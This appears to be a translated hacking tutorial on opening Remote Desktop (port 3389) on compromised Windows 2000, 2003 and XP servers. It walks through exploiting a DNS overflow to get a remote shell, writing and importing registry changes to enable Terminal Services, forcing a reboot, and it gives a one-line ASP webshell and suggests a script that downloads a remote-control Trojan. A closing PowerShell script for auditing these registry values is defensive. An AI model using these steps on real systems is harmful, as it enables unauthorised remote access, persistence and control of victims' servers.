1. Win7, Win2003 and XP systems
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2. Windows 2000
First, a brief description of the DNS overflow attack. The overflow program I use is Dns.exe; running it under CMD shows its usage, parameters and other information. Execute "dns -s IP" to check whether the target IP has the DNS overflow vulnerability. If it does, execute "dns -t 2000all IP 1207"; the program then tells us that a shell has been returned on port 1100, and "telnet IP 1100" gets us the returned cmdshell. Note that the current directory is c:\winnt\system32. What we need to do next is write a 3389.reg registry file using the "echo" command. Copy the following lines into the cmdshell window one at a time, pressing ENTER after each to execute it:
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
Briefly, ">" redirects output to a file, creating it if it does not exist and otherwise overwriting its content; ">>" appends, so the output is written after the file's existing content. Here the content is written into the 3389.reg file. Note the second line: its effect is to write an empty line, because the format of a .reg file requires it. Once the file has been written successfully, perform the import by executing "regedit /s 3389.reg"; the registry file is now imported into the registry. However, be aware that in the cmdshell no character may be lost, otherwise the import will not work; it is recommended that you type the lines in Notepad first and make sure they are correct before copying them into the cmdshell window to execute. You can then restart the target host with the following method. Execute the following code under the cmdshell:
@echo off & cd /d %temp% & echo [Version] > {out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> {out}.inf
echo [DefaultInstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%\{out}.inf
Copy the above five lines into the cmdshell one at a time, pressing ENTER after each; once all five have executed, the server restarts. Of course, there are many ways to restart a server, such as terminating a critical system process or simulating keystrokes from code. Barring accidents, after waiting for the server to finish restarting, connecting to the target shows that Remote Desktop Services has been successfully enabled. On Windows 2000, then, Remote Desktop Services is enabled once the overflow returns a cmdshell and the steps above complete successfully.
3. Windows 2003
Compared with 2000, it is easier to enable Remote Desktop Services from a 2003 cmdshell, at least without rebooting! The first method is to use the "echo" command to write a 3389.reg file and then import it with "regedit /s 3389.reg", which is relatively simple and similar to the 2000 method described above. Copy the following lines into the cmdshell window one at a time, pressing ENTER after each to execute it:
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
After completing the steps above, execute "regedit /s 3389.reg" to import the file and the change takes effect! However, this method is relatively troublesome, and we can use another, simpler way to enable Remote Desktop Services. Before introducing it, let's familiarize ourselves with the most critical registry value for Remote Desktop Services on a 2003 system.
Under "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" there is a value named "fDenyTSConnections" whose data is 1 or 0. When the value is 1, Remote Desktop Services is disabled; when it is 0, it is enabled. In other words, as long as we can change the data of this registry value from the cmdshell, we achieve the goal of enabling Remote Desktop Services! Fortunately, 2003 has a "reg" command that can do exactly this. Here we find a server running 2003 and, using the same overflow method described above, obtain a cmdshell. When we try to connect to Remote Desktop we find that we cannot connect at all. The following explains in detail how to use the "reg" command to enable Remote Desktop Services. Execute:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
We find that the data of the "fDenyTSConnections" value is "0x1", which is 1 in hexadecimal. As mentioned above, data of 1 means Remote Desktop Services is not enabled. All we have to do is change "0x1" to "0x0"! Doing this directly with "reg add" is not possible; you must delete the original value and then add it again! Execute under the cmdshell:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
It asks "Do you want to delete the registry value fDenyTSConnections?"; answer yes. Then execute:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
It reports that the operation completed successfully. This changes the value of "fDenyTSConnections" to "0x0", which we can verify by executing:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
We find that the data has been changed successfully. Now connecting to port 3389 on the server, we find that we can connect successfully and can create a user to work with. This is how Remote Desktop Services is enabled from a cmdshell on 2003.
It is not necessary to enable Remote Desktop Services from the cmdshell after the overflow.
You can echo a .vbs file that downloads a remote-control Trojan, then run the Trojan from the cmdshell and connect to it.
There is also the case where the target IP hosts a website: if there is a site directory, echo a one-line webshell into it (the command is: echo "<%execute request("cmd")%>" > webpath\test.asp), connect with China Chopper, upload a larger webshell, then upload a tool that enables 3389 and run it; that works too.
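As an added audit example (not code from the original article), the following PowerShell reads the registry values the sections above modify and reports whether Remote Desktop Services is enabled, on which port it listens (dword 00000d3d is 3389), and whether the listener is actually open; it is what a defender would run to check whether these changes have been made on a host. It assumes it runs as an administrator on Windows 8/2012 or later; the expected-state values in the warnings are assumptions for this example.

```powershell
# Added audit example: inspect the Terminal Server registry values that the
# article's .reg file and "reg add" commands change, and report deviations.
$ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value absent on this host
}

$state = [ordered]@{
    fDenyTSConnections  = Get-RegValue $ts 'fDenyTSConnections'
    TSEnabled           = Get-RegValue $ts 'TSEnabled'   # Windows 2000 only
    TermServiceStart    = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService' 'Start'
    TermDDStart         = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\TermDD' 'Start'
    PortNumberTds       = Get-RegValue "$ts\Wds\rdpwd\Tds\tcp" 'PortNumber'
    PortNumberRdpTcp    = Get-RegValue "$ts\WinStations\RDP-Tcp" 'PortNumber'
    EnableAdminTSRemote = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'EnableAdminTSRemote'
}

$findings = @()
# Assumed expected state for a host that should not accept Remote Desktop connections.
if ($state.fDenyTSConnections -eq 0) { $findings += 'fDenyTSConnections=0: Remote Desktop connections are allowed' }
if ($state.TSEnabled -eq 1)          { $findings += 'TSEnabled=1: Terminal Services enabled (Windows 2000 value)' }
if ($state.TermServiceStart -eq 2)   { $findings += 'TermService Start=2: service set to automatic start' }
foreach ($k in 'PortNumberTds', 'PortNumberRdpTcp') {
    $p = $state.$k
    if ($null -ne $p -and $p -ne 3389) { $findings += "${k}=${p}: RDP listener moved off the default port" }
}

# Live check: is anything listening on the configured RDP port right now?
$port = if ($state.PortNumberRdpTcp) { $state.PortNumberRdpTcp } else { 3389 }
if (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue) {
    $open = Get-NetTCPConnection -State Listen -LocalPort $port -ErrorAction SilentlyContinue
    if ($open) { $findings += "TCP port $port is listening: RDP is reachable" }
}

[pscustomobject]$state | Format-List
if ($findings) { $findings | ForEach-Object { Write-Warning $_ } }
else { Write-Output 'No Remote Desktop deviations found.' }
```

Baseline a known-good host first, then compare; the same values can be collected fleet-wide and alerted on when they change.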
Open remote Windows system 3389 port